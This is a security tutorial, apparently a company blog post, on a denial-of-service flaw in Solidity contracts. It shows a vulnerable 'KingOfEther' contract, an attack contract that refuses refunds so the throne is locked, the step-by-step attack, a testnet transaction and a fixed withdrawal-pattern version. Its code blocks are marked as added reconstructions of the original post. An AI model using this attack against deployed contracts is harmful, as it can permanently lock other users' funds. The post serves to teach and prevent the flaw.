Detailed explanation of Ethereum smart contract vulnerabilities — On-chain Vulnerability Recurrence — Denial of Service (DoS)

Welcome to follow and discuss with us

Author: support@lunaray.co

0x01 Vulnerability principle

An externally owned account always accepts ETH sent with <address>.call, but a contract can refuse it: if the receiving contract has no payable receive() or fallback() function, or reverts inside it, the call fails. Any contract that pushes ETH to an address it does not control and requires that push to succeed can therefore be blocked by that address.

0x02 Vulnerable contract

The vulnerable contract is written for Solidity ^0.8.10.

The goal of KingOfEther is that a user becomes the new king by sending more ETH than the previous user; the contract then refunds the ether that the previous king had sent.

0x03 Attack idea

Since a contract with no payable receive()/fallback() cannot accept ETH sent via <address>.call, the refund to such a contract always fails. If an attack contract becomes king, every later refund attempt reverts, and the vulnerable contract is permanently stuck.

0x04 Attack contract

Next, write the attack contract:

The attacker calls the attack function, which forwards the ETH to the vulnerable contract's claimThrone(). The attack contract becomes the new king, and because it cannot receive the refund, no one can become the next king.
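The following is an added reconstruction of the two contracts the sections 0x02 and 0x04 describe; it is not the code from the original post. The contract and function names (KingOfEther, claimThrone, Attack, attack) follow the text, everything else is assumed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// Vulnerable: refunds the previous king with a push payment inside claimThrone().
contract KingOfEther {
    address public king;
    uint256 public balance;

    function claimThrone() external payable {
        require(msg.value > balance, "Need to pay more to become the king");

        // Push the refund to the previous king. If `king` is a contract that
        // cannot accept ETH (no receive()/fallback(), or one that reverts),
        // this call fails and the whole transaction reverts, so the throne
        // can never change hands again. (On the very first claim `king` is
        // address(0) and `balance` is 0, so the call succeeds.)
        (bool sent, ) = king.call{value: balance}("");
        require(sent, "Failed to send Ether");

        balance = msg.value;
        king = msg.sender;
    }
}

// Attack contract as described in the post: it deliberately has no
// receive() or fallback(), so any refund sent to it reverts.
contract Attack {
    KingOfEther public kingOfEther;

    constructor(KingOfEther _kingOfEther) {
        kingOfEther = _kingOfEther;
    }

    // Forward the attached ETH to claimThrone(); the attack contract becomes
    // king and every later claimThrone() call reverts at the refund step.
    function attack() external payable {
        kingOfEther.claimThrone{value: msg.value}();
    }
}
```

The defect to look for in review is the combination of a push payment to an arbitrary address with `require(sent, ...)`: the recipient, not the contract, decides whether claimThrone() can ever succeed again.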

0x05 Attack process

  1. Deploy KingOfEther
  2. Alice becomes king by sending 1 Ether to claimThrone().
  3. Bob becomes king by sending 2 Ether to claimThrone(). Alice receives a refund of 1 ether.
  4. Deploy the attack with the address of KingOfEther.
  5. Call attack with 3 Ether.
  6. The attack contract is now the king, and no one can become the new king.

0x06 On-chain recurrence

The vulnerability has been reproduced on-chain following the attack process above. When a new user then tries to claim the throne, the transaction fails:

https://kovan.etherscan.io/tx/0xb69a8e160045179565057cc366039dfb8f835eeb58ce85a6da553b5ca5c38a89

0x07 Prevention techniques

  • One way to prevent this is to let users withdraw their ether instead of having the contract send it to them (the withdrawal pattern, "pull over push").

Record the amount owed to each account that has been king, and let that account withdraw it through a separate withdrawal function. A recipient that cannot accept ETH then only blocks its own withdrawal, not claimThrone() for everyone else.
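An added example of the hardened contract using the withdrawal pattern described above; it is not the code from the original post. The mapping name `balances` and the `withdraw()` function are assumptions, chosen to match the text.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// Hardened: claimThrone() never sends ETH. Refunds are recorded and each
// former king pulls their own funds, so a non-paying recipient can only
// block itself.
contract KingOfEther {
    address public king;
    uint256 public balance;
    mapping(address => uint256) public balances;

    function claimThrone() external payable {
        require(msg.value > balance, "Need to pay more to become the king");

        // Record the refund owed to the previous king instead of pushing it.
        // No external call here, so nothing the previous king does can revert this.
        balances[king] += balance;

        balance = msg.value;
        king = msg.sender;
    }

    function withdraw() external {
        require(msg.sender != king, "Current king cannot withdraw");

        uint256 amount = balances[msg.sender];
        require(amount > 0, "Nothing to withdraw");

        // Checks-effects-interactions: zero the balance before the external
        // call so a re-entrant withdraw() cannot drain the contract.
        balances[msg.sender] = 0;

        (bool sent, ) = msg.sender.call{value: amount}("");
        require(sent, "Failed to send Ether");
    }
}
```

With this version an attack contract without a receive() function can still become king and can still be dethroned; its refund simply stays in `balances[attacker]` until a caller that can receive ETH claims it, and claimThrone() keeps working for everyone else.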
